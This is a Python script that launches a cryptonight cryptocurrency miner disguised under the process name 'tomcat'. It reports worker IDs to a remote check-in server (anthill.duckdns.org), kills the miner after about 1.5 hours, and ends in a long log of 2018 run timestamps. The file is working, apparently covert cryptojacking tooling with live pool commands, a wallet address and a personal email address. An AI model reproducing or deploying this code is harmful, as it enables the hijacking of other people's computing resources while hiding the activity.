import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:22:06.579265
#2018-02-17 16:09:06.097732
#2018-02-17 17:56:07.215499
#2018-02-17 19:46:06.990551
#2018-02-17 21:34:03.992857
#2018-02-17 23:18:01.683842
#2018-02-18 01:06:02.189970
#2018-02-18 02:53:04.412630
#2018-02-18 04:42:04.126433
#2018-02-18 06:34:06.468846
#2018-02-18 08:22:01.711187
#2018-02-18 10:10:09.880062
#2018-02-18 11:56:05.673815
#2018-02-18 13:41:05.578592
#2018-02-18 15:32:05.375708
#2018-02-18 17:20:07.147321
#2018-02-18 19:09:01.639890
#2018-02-18 20:55:06.274826
#2018-02-18 22:42:06.172980
#2018-02-19 00:31:05.081454
#2018-02-19 02:15:09.519727
#2018-02-19 04:04:05.083041
#2018-02-19 05:48:02.104838
#2018-02-19 07:36:08.097016
#2018-02-19 09:25:08.280965
#2018-02-19 11:15:01.616005
#2018-02-19 13:02:06.620039
#2018-02-19 14:51:01.884116
#2018-02-19 16:39:06.726985
#2018-02-19 18:26:07.634781
#2018-02-19 20:11:05.890095
#2018-02-19 22:02:04.076359
#2018-02-19 23:49:04.424055
#2018-02-20 01:35:06.204608
#2018-02-20 03:23:04.145658
#2018-02-20 05:10:06.425187
#2018-02-20 06:53:05.218445
#2018-02-20 08:40:08.214074
#2018-02-20 10:24:06.701017
#2018-02-20 12:08:09.201617
#2018-02-20 13:57:01.975615
#2018-02-20 15:40:09.178419
#2018-02-20 17:26:12.216273
#2018-02-20 19:15:08.306031
#2018-02-20 21:05:04.944897
#2018-02-20 22:49:05.079939
#2018-02-21 00:33:04.218328
#2018-02-21 02:18:02.203942
#2018-02-21 04:05:08.837076
#2018-02-21 05:52:05.580125
#2018-02-21 07:40:10.883442
#2018-02-21 09:25:10.617617
#2018-02-21 11:14:07.766909
#2018-02-21 13:01:08.913224
#2018-02-21 14:49:09.883797
#2018-02-21 16:38:06.558004
#2018-02-21 18:27:08.256686
#2018-02-21 20:12:08.251511
#2018-02-21 22:01:08.820969
#2018-02-21 23:48:05.619956
#2018-02-22 01:39:02.165634
#2018-02-22 03:26:05.673901
#2018-02-22 05:13:06.915563
#2018-02-22 06:58:01.280694
#2018-02-22 08:46:06.339292
#2018-02-22 10:35:09.797517
#2018-02-22 12:22:07.707725
#2018-02-22 14:07:09.696105
#2018-02-22 15:54:01.656306
#2018-02-22 17:41:06.066605
#2018-02-22 19:28:02.151627
#2018-02-22 21:20:01.428892
#2018-02-22 23:04:08.573698
#2018-02-23 00:50:11.121862
#2018-02-23 02:39:03.501374
#2018-02-23 04:28:01.909624
#2018-02-23 06:13:06.650205
#2018-02-23 07:59:05.206513
#2018-02-23 10:15:11.027433
#2018-02-23 12:09:08.419747
#2018-02-23 13:57:08.663960
#2018-02-23 15:49:16.491601
#2018-02-23 17:35:07.068985
#2018-02-23 19:23:05.948462
#2018-02-23 21:07:02.196362
#2018-02-23 22:52:07.045008
#2018-02-24 01:13:05.087446
#2018-02-24 03:06:03.751958
#2018-02-24 04:52:08.114091
#2018-02-24 06:38:01.554356
#2018-02-24 08:27:05.528074
#2018-02-24 10:13:05.025096
#2018-02-24 12:08:01.678505
#2018-02-24 13:54:06.231507
#2018-02-24 15:43:06.895340
#2018-02-24 17:36:05.880850
#2018-02-24 19:22:04.570748
#2018-02-24 21:13:05.119329
#2018-02-24 23:47:06.846169
#2018-02-25 03:07:04.028881
#2018-02-25 06:44:07.224702